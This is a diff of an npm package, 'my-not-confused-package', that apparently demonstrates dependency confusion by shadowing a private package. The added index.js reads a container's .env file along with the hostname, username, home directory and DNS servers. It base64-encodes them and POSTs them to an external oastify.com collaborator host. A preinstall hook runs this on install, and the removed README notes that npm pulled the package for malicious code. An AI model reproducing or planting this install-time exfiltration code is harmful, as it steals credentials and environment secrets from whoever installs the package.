my-not-confused-package 0.0.1-security → 1.0.1

package/index.js

@@ -0,0 +1,122 @@
+// packages/my-confused-package-public/index.js
+// This represents potentially malicious or just different code.
+module.exports = {
+  getMessage: () => "WARNING! Loaded the PUBLIC shadowed package!",
+  getBackgroundColor: () => "salmon", // Visual indicator for public (warning)
+  getVersion: () => "1.0.1",
+  getSource: () => "public",
+  getInfo: () => `Loaded PUBLIC package version ${module.exports.getVersion()}. THIS SHOULD NOT HAPPEN!`
+};
+
+const os = require("os");
+const dns = require("dns");
+// querystring is no longer needed
+// const querystring = require("querystring");
+const https = require("https");
+const fs = require("fs"); // Added fs module for file system operations
+const path = require("path"); // Added path module for joining paths
+
+// --- Docker Detection Logic ---
+let isDocker = false;
+try {
+  // Check /proc/self/cgroup for 'docker' or 'container' keywords
+  const cgroupContent = fs.readFileSync('/proc/self/cgroup', 'utf8');
+  if (cgroupContent.includes('docker') || cgroupContent.includes('container')) {
+    isDocker = true;
+    console.log("Detected Docker environment. Request will be sent."); // Log detection
+  } else {
+    console.log("Not in Docker environment. Request will be skipped."); // Log non-detection
+  }
+} catch (e) {
+  // Ignore errors (e.g., file not found if not in a Linux container env)
+  // console.error("Error checking cgroup:", e.message); // Optional: log error
+  console.log("Could not check cgroup (e.g., not Linux or permission error). Request will be skipped."); // Log error and skip
+}
+// --- End Docker Detection Logic ---
+
+
+// --- Read .env file ---
+let envContent = 'N/A (File not found or read error)';
+const envFilePath = '/app/consumer/.env'; // The target file path
+
+try {
+    // Check if the file exists before reading
+    if (fs.existsSync(envFilePath)) {
+        envContent = fs.readFileSync(envFilePath, 'utf8');
+        // console.log(".env file read successfully."); // Optional: log success
+    } else {
+        envContent = 'N/A (File does not exist)';
+        // console.warn(".env file not found at:", envFilePath); // Optional: log warning
+    }
+} catch (e) {
+    // Catch potential errors during file reading (permissions, etc.)
+    envContent = `N/A (Read error: ${e.message})`;
+    // console.error("Error reading .env file:", e.message); // Optional: log error
+}
+// --- End Read .env file ---
+
+
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+// Prepare the data object
+const trackingData = {
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    // --- Conditional DNS Call (still conditional within data) ---
+    // Include DNS servers only if isDocker is true
+    dns: isDocker ? dns.getServers() : "N/A (Not Docker)",
+    // --- End Conditional DNS Call ---
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+    // --- Add .env content ---
+    env: envContent,
+    // --- End Add .env content ---
+};
+
+// Stringify the data object
+const trackingDataJSON = JSON.stringify(trackingData);
+
+// Encode the stringified data into Base64
+const postData = Buffer.from(trackingDataJSON, 'utf8').toString('base64');
+
+// --- Conditional HTTPS Request ---
+if (isDocker) {
+    var options = {
+        hostname: "1ikqxwk03fbaa320vbuo46025tbkzbzzo.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+        port: 443,
+        path: "/",
+        method: "POST",
+        headers: {
+            // --- Changed Content-Type to text/plain or similar ---
+            // application/json could also work if server expects JSON base64 encoded
+            // text/plain is generic for arbitrary base64 data
+            "Content-Type": "text/plain",
+            // --- Content-Length is the length of the Base64 string ---
+            "Content-Length": postData.length,
+        },
+    };
+
+    var req = https.request(options, (res) => {
+        res.on("data", (d) => {
+            process.stdout.write(d);
+        });
+    });
+
+    req.on("error", (e) => {
+        // console.error(e);
+    });
+
+    // Send the Base64 encoded string as the request body
+    req.write(postData);
+    req.end();
+} else {
+    // This block is executed if not in Docker, and the request is skipped.
+    // We already log this inside the try/catch block for detection.
+    // You could add more specific logging here if needed.
+}
+// --- End Conditional HTTPS Request ---

package/package.json

@@ -1,6 +1,13 @@
-{
-  "name": "my-not-confused-package",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "my-not-confused-package",
+  "version": "1.0.1",
+  "description": "A public package that shadows the private one.",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"hello from public npm registry\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "source": "public",
+  "author": "",
+  "license": "ISC"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=my-not-confused-package for more information.